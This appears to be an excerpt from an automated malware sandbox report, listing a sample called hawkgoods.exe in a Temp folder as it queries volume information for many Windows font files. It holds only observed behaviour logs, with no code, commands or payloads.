                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
